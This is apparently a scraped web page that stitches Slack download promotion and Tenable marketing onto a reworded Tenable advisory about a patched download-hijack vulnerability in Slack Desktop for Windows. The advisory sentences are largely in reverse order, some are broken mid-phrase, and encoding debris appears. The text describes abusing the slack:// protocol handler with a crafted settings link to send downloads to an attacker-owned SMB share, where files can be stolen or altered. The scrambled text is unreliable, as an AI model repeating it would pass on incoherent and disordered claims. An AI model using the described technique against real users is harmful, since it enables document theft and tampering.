If you want to enjoy the features of Slack or try it for your business, you might want to download it and test it for a while.
Windows users learn about Slack download for Windows and transform the communication standard! Steps to Download the App If you are running a small business and you want to manage it like a pro, Slack can be amazing for being the best way to communicate remotely.
Get a free 60-day trial of Tenable.io Vulnerability Management.Slack, being one of the most famed apps for connecting people for everyday communication to business communication, is loved by users now.
Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.
Administrators of Slack deployed via Microsoft Install can read here for more information on how to manually update. SolutionĬonfirm that your Slack for Windows is updated to version 3.4.0. Additionally, if an Office Document (Word, Excel, etc.) is downloaded, the attacker's server could inject malware into it, so that when opened, the victim machine is compromised. For example, if financial documents like invoices are downloaded, the attacker could not only read account numbers but also change them. Once the download path has been altered, the attacker can not only steal documents downloaded in the Slack Application, they can also manipulate the documents. rss feeds the target Slack subscribes to. This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which. rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks. While less effective, these hyperlink attacks could be done without Slack channel authentication, via external. Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview. The attack can be performed through any Slack direct messaging or Slack channel to which an attacker might be authenticated.
As always, users are encouraged to upgrade their apps and clients to the latest available version. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted.
Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0. Tenable reported to Slack a vulnerability related to the Slack Desktop Application for Windows via HackerOne. The hyperlink text can be masqueraded by using the "attachment" feature in Slack, which allows an attacker to replace the hyperlink’s actual uniform resource identifier with any custom text, possibly fooling users into clicking. The attacker could also manipulate the contents of the documents after download before the victim opens them. This download path can be an attacker-owned SMB share, which would cause all future documents downloaded in Slack to be instantly uploaded to the attacker's server. A crafted link like “slack://settings/?update=” will change the default download location. AnalysisĪn attacker can abuse the "slack://" protocol handler, which has the capability to change sensitive settings in the Slack Desktop Application. We cannot confirm how many of those are Windows App users. Slack has 10 million active users every day and 85,000 organizations use the paid version. It does require user interaction to exploit, giving it a CVSSv2 score of 5.5 (Medium).
This vulnerability, which has been patched, would have allowed an attacker to post a crafted hyperlink into a Slack channel or private conversation that changes the document download location path when clicked. Tenable Research discovered a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows. Users should ensure their Slack desktop application is up to date. Tenable worked with Slack via HackerOne based on our coordinated disclosure policy and Slack has since released a new version of its Windows desktop client to address this vulnerability. Tenable Researcher David Wells discovered a vulnerability in Slack Desktop for Windows that could have allowed an attacker to alter where files downloaded within Slack are stored.